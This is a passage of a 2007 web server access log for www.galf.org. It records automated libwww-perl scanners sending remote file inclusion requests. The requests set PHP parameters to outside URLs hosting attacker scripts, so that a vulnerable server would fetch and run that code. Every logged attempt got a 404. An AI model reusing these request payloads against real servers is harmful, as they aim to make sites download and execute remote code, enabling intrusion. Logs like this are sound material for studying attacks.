204.11.234.20 - - [28/Oct/2007:15:23:27 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/071011004039p/new? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
86.120.49.2 - - [28/Oct/2007:15:23:27 -0700] "GET /logs//mcf.php?content=? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
204.11.234.20 - - [28/Oct/2007:15:23:39 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/071011004039p/new? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
204.11.234.20 - - [28/Oct/2007:15:23:39 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/071011004039p/new? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
86.120.49.2 - - [28/Oct/2007:15:23:42 -0700] "GET /logs//mcf.php?content=? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
86.120.49.2 - - [28/Oct/2007:15:24:10 -0700] "GET /logs//mcf.php?content=? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
86.120.49.2 - - [28/Oct/2007:15:24:18 -0700] "GET /logs//mcf.php?content=? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
207.45.176.234 - - [28/Oct/2007:15:24:31 -0700] "GET /logs/scripts.log/index.php3?id=http://www.urjb.com/photos/albums/userpics/10001/thumb_blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
62.1.205.128 - - [28/Oct/2007:15:25:29 -0700] "GET /logs/access_070826.log//shop/index.php?action=http://qlzr.net/links.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
62.1.205.128 - - [28/Oct/2007:15:25:30 -0700] "GET //shop/index.php?action=http://qlzr.net/links.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64"
62.1.205.128 - - [28/Oct/2007:15:25:30 -0700] "GET /logs//shop/index.php?action=http://qlzr.net/links.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
217.29.150.126 - - [28/Oct/2007:15:25:44 -0700] "GET /logs/access_070910.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/071011004039p/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
217.29.150.126 - - [28/Oct/2007:15:25:59 -0700] "GET /logs/access_070910.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/071011004039p/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
86.120.49.2 - - [28/Oct/2007:15:26:12 -0700] "GET /logs//mcf.php?content=? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
217.29.150.126 - - [28/Oct/2007:15:26:46 -0700] "GET /logs/access_070924.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/071011004039p/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
217.29.150.126 - - [28/Oct/2007:15:26:52 -0700] "GET /logs/access_070924.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/071011004039p/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
207.58.161.133 - - [28/Oct/2007:15:27:54 -0700] "GET /logs//catalog/includes/include_once.php?include_file=http://e-golld.us/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
207.58.161.133 - - [28/Oct/2007:15:27:55 -0700] "GET //catalog/includes/include_once.php?include_file=http://e-golld.us/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
71.39.106.12 - - [28/Oct/2007:15:28:11 -0700] "GET /logs/admin/editor2/spaw_control.class.php?spaw_root=http://kk10.site.voila.fr/p.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
71.39.106.12 - - [28/Oct/2007:15:28:11 -0700] "GET /admin/editor2/spaw_control.class.php?spaw_root=http://kk10.site.voila.fr/p.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
86.120.49.2 - - [28/Oct/2007:15:28:31 -0700] "GET /logs//mcf.php?content=? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
207.45.176.234 - - [28/Oct/2007:15:28:47 -0700] "GET /logs/access_071001.log/index.php3?id=http://www.urjb.com/photos/albums/userpics/10001/thumb_blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
207.58.191.155 - - [28/Oct/2007:15:30:24 -0700] "GET /logs/access_070826.log/shop/index.php?action=http://www.diegocammarata.it/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
207.58.191.155 - - [28/Oct/2007:15:30:24 -0700] "GET /shop/index.php?action=http://www.diegocammarata.it/mambot